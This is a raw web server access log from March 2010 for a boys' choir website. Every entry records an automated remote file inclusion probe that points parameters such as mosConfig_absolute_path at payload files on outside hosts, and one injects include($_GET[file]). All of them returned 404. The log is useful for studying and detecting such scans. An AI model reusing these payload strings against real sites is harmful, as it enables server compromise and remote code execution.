208.69.40.227 - - [09/Mar/2010:08:15:48 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:15:58 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:15:58 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:15:58 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:16:03 -0800] "GET /logs/access_100214.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:16:07 -0800] "GET /sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:16:07 -0800] "GET /logs//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:16:07 -0800] "GET /logs/access_100109.log//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:16:10 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:16:10 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:16:10 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:16:15 -0800] "GET /logs/access_100214.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:16:26 -0800] "GET /logs/access_100129.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:16:32 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:16:33 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:16:33 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:16:33 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:16:33 -0800] "GET /logs/access_100214.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:16:40 -0800] "GET /logs/access_100129.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:16:47 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:17:15 -0800] "GET /logs/access_100117.log%20%20/index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.157.211.204 - - [09/Mar/2010:08:17:22 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.157.211.204 - - [09/Mar/2010:08:17:22 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.157.211.204 - - [09/Mar/2010:08:17:22 -0800] "GET /logs/access_100228.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:17:58 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:17:58 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:17:58 -0800] "GET /logs/access_100228.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:18:09 -0800] "GET /logs/access_100129.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:18:14 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:18:14 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:18:19 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.243.44 - - [09/Mar/2010:08:18:48 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.sithome.com/technote6/data/r0x-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:18:52 -0800] "GET /logs//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:18:52 -0800] "GET /logs/access_100109.log//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:18:52 -0800] "GET /sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:18:56 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:18:56 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:18:56 -0800] "GET /logs/access_100228.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:18:57 -0800] "GET /logs/access_100129.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:19:09 -0800] "GET /logs/access_100109.log//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:19:09 -0800] "GET /sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:19:09 -0800] "GET /logs//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:19:18 -0800] "GET /logs/access_100112.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:19:23 -0800] "GET /index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:19:26 -0800] "GET /logs//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:19:26 -0800] "GET /logs/access.log//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:19:26 -0800] "GET /logs/index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:19:26 -0800] "GET /sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:19:27 -0800] "GET /logs/access_100117.log%20%20/index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:19:29 -0800] "GET /sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:19:29 -0800] "GET /logs//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:19:29 -0800] "GET /logs/access.log//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:20:15 -0800] "GET /logs//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:20:15 -0800] "GET /sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:20:15 -0800] "GET /logs/access_100109.log%20%20//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.224.132.89 - - [09/Mar/2010:08:21:13 -0800] "GET /logs/access_100214.log%20%20/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.224.132.89 - - [09/Mar/2010:08:21:13 -0800] "GET /lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.224.132.89 - - [09/Mar/2010:08:21:13 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.224.132.89 - - [09/Mar/2010:08:21:13 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:21:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:21:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:21:20 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:21:25 -0800] "GET /logs/access_100129.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:08:21:26 -0800] "GET /logs/access_100116.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kecschool.co.kr/upfiles/s041/.../id4.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:08:21:26 -0800] "GET /logs/access_100214.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kecschool.co.kr/upfiles/s041/.../id4.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:21:39 -0800] "GET /logs/access_100129.log%20%20/index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:22:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:22:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:22:02 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:22:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:22:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:22:02 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.93.165.28 - - [09/Mar/2010:08:22:04 -0800] "GET /logs//delete.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.93.165.28 - - [09/Mar/2010:08:22:11 -0800] "GET /logs//delete.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.93.165.28 - - [09/Mar/2010:08:22:14 -0800] "GET /delete.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.93.165.28 - - [09/Mar/2010:08:22:14 -0800] "GET /logs/access_100131.log%20%20//delete.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:22:28 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:22:32 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.69.40.227 - - [09/Mar/2010:08:22:33 -0800] "GET /logs/access_100112.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:22:48 -0800] "GET /logs/access_100129.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:22:50 -0800] "GET /com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:22:50 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:22:52 -0800] "GET /logs/access_091111.log//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:22:52 -0800] "GET /sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:22:52 -0800] "GET /logs//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:23:00 -0800] "GET /logs/access_100117.log//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:23:21 -0800] "GET /logs/access_100101.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:23:21 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:23:21 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:23:26 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:23:26 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:23:27 -0800] "GET /logs/access_100101.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:23:56 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:24:00 -0800] "GET /logs/access_100129.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:24:06 -0800] "GET /logs/access_091229.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:24:08 -0800] "GET /logs/access_091229.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:24:15 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:24:19 -0800] "GET /com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:24:21 -0800] "GET /logs/access_100129.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:24:29 -0800] "GET /logs/access_100129.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:24:30 -0800] "GET /logs/access_100116.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:24:30 -0800] "GET /logs/access_100214.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:24:30 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:24:31 -0800] "GET /logs/access_100116.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:24:31 -0800] "GET /logs/access_100214.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:24:40 -0800] "GET /logs/access_100116.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:24:40 -0800] "GET /logs/access_100214.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:24:47 -0800] "GET /logs/access_091111.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:24:47 -0800] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:24:47 -0800] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:25:10 -0800] "GET /logs/access_100209.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
